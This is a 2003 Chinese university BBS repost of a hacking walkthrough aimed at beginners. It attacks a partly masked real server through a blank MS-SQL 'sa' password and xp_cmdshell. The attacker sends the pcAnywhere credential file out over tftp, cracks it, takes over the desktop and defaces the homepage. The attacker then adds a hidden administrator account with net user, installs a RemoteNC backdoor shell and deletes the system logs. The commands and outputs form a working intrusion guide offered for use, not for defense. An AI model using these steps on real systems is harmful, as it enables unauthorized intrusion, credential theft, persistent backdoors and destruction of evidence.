● [转帖]MS-SQL空口令结合pcanywhere的功击 - 荔园在线 | 深圳大学学生论坛,荔园晨风BBS,深大在线网站

荔园之美，在春之萌芽，在夏之绽放，在秋之收获，在冬之沉淀

发信人: hellsolaris (qq), 信区: Security
标题: [转帖]MS-SQL空口令结合pcanywhere的功击
发信站: 荔园晨风BBS站 (Fri Dec 5 09:54:56 2003)

MS-SQL空口令结合pcanywhere的功击
------------------------------------------------------------------------------
--
发布者:wing 来源:亿客安全网类别:技术文摘日期:01-10 今日/总浏览: 1/1513

一次利用MS-SQL空口令漏洞进行攻击完过程,献给广大初学者们,高手们看了不要笑哦;)

先ping出目标主机的IP地址：
连接IP主机: 211.154.xxx.xx...
发送 56 个字节...
接收到 56 个字节! 历时: 0毫秒
结论: IP主机正在与Internet连接中...
　　接着选择打开扫描器x-way,选择高级扫描功能。输入目标IP，开始扫描。数分钟后得
到扫描结果如下（结果经整理）：
主机信息
主机名:BEWDB01NOK
80(HTTP)
21(FTP Control)
25(SMTP)
443(HTTPS)
1433(MSSQL)
5631(PCAnyWhere)
用户列表
Administrator (Admin) Guest hacker (Admin) IUSR_BEWDB01NOK IWAM_BEWDB01NOK ogi
lvy remoteuser (Admin)
漏洞：
/\../readme.txt (HTTP: 200 )
/msadc/msadcs.dll (HTTP: 200 )
/iisadmpwd/achg.htr (HTTP: 200 )
/_AuthChangeUrl (HTTP: 200 )
/?PageServices (HTTP: 200 )
　　上一步中得到目标服务器的相关有用信息。可以发现扫描结果中并无可用的asp/cgi漏
洞。而从所开端口来看，
21(FTP Control)
1433(MSSQL)
5631(PCAnyWhere)
只有这三个可用。在万一得已的情况下，我是不会用暴力破ftp的。那么只好从
1433,5631这两个端口入手了！我们知道，1433是ms-sql的服务端口，默认情况下它的最高
权限用户帐号SA口令为空。如果管理员疏忽了这一点，没有给ＳＡ一个口令的话，事情就
好办了！先来试试看。从www.tianxing.org下一个ms-sql的客户端，在Host框中输入目标
ip:211.154.xxx.xx
Username为sa
password框空，连接：
SQL>Connecting 211.154.xxx.xx
SQL>Connected to 211.154.xxx.xx
　　呵呵！看来对方管理员没有对sa设置一个口令！太好了！可以在客户端以xp_cmdshel
l " "的形式运行任意dos指令了！dir一下试试看：
SQL>Command: xp_cmdshell "dir c:\"
驱动器 C 中的卷没有卷标。
卷的序列号是 5CBD-664C
卷的序列号是 5CBD-664C
c:\ 的目录
c:\ 的目录
01-12-20 08:13p <DIR> 2u2u
01-07-23 08:10p 0 AUTOEXEC.BAT
01-11-28 04:02p 84 biaoti.txt
01-07-23 08:10p 0 CONFIG.SYS
01-11-22 11:49a <DIR> InetPub
01-10-25 11:12a 15,360 kkkk.XLS
01-07-24 12:09p <DIR> MSSQL7
01-12-12 11:00a 134,217,728 pagefile.sys
01-11-30 10:59a <DIR> Program Files
01-09-04 02:43p 136 sp_attach.sql
01-12-20 04:12p <DIR> temp
01-09-27 11:14a <DIR> unzipped
01-12-15 12:09a <DIR> WINNT
13 个文件 134,233,308 字节
54,232,576 字节可用
54,232,576 字节可用
这时我们便可以改对方的主页了！前提是先找到对方的web目录！来找找看
…………
ＸＸ分钟后，满头大汉，乖乖！竟然有Ｘ个盘，每个盘下又有ＸＸ个目录，这样找下去得
何年何月？不成！要是有windows界面的形式就好找的多了！想想看，目标主机还开着563
1端口，这正是pcanywhere远程管理端口呀！取了它的管理帐号和密码不就得了吗？不错的
想法，呵呵……
默认情况下，pcanywhere安装于c:\Program Files目录下，其data目录下的.cif文件中保
存着加密过的连接帐号和密码。只要得到此文件，就可以用一个叫pcanywherepwd的软件快
速解出密码！
且看如何得到这个.cif文件。先用x-way的内置tftp服务器在本机建立tftp服务：
选择“工具”菜单中的tftp服务器。设置一个默认根目录，点启动即可！
然后再用ms-sql客户端在目标服务器执行如下指令：
copy c:\progra~1\pcanywhere\data\New Caller.CIF c:\winnt\system32
tftp -i 本地ip　put New Caller.CIF
命令执行成功，这个cif文件已被传到本地tftp目录下了！
此时，用pcanywherepwd.exe破解此文件，得到用户名为：administrator
密码为：amsrepair
打开pcanywhere manager建立一个指向211.154.xxx.xx的通道。在setting项中选择netwo
rk host pc to control or ip adress, 并添上目标ip：211.154.xxx.xx
选中login information项中的automatically login to host up connection
并在下面的login name和password栏中添入刚才得到的用户名和密码！确定即可。双击新
建立的通道，稍等片刻即可看到了对方桌面。这下好搞了，呵呵～～在
g:\home\wwweb\目录下，终于找到了他们的index.htm。删！再手动定一个简单的文件:

<html>
<head>
<title>hacked<title>
</head>
<body>
<center>
hacked
</center>
</body>
保存为：index.htm
修改主页完成。

该留个后门了，这是个NT主机，用小榕的RemoteNC做后门最好不过了！
先给系统加个超级用户，用ms-sql来做：
net user wing wing /add
net localgroup administrators wing /add
从对方桌面上打开ie连到小榕的站上下载RemoteNC，然后进入命令提示行状态,键入：

RemoteNC 211.154.xxx.xx wing wing LocalSystem "RemoteNC" "Provide Local CMD Re
direct" 7 123456
系统显示：
[Install Service as RunasUser Mode]
Connecting 211.154.xxx.xx ..... Done.
Transffer File ..... Done.
Start Service ..... Done.

Now You can 211.154.xxx.xx to Connect, Have a Joy :-) 安装成功
这样在任何时候都可以telnet 211.154.xxx.xx 7输入密码：123456即可使用系统任何资源
了！;)
接下来该清理战场了，在ms-sql下停掉对方的ftp和www服务：
net stop msftpsvc
net stop w3svc
删除c:\winnt\sys tem32\logfile下的所有文件。
再将服务恢复：
net start msftpsvc
net start w3svc
OK,一切搞定！bye bye

--

※ 来源:．荔园晨风BBS站 http://bbs.szu.edu.cn [FROM: 192.168.44.223]

荔园在线首页友情链接：深圳大学深大招生荔园晨风BBS S-Term软件网络书店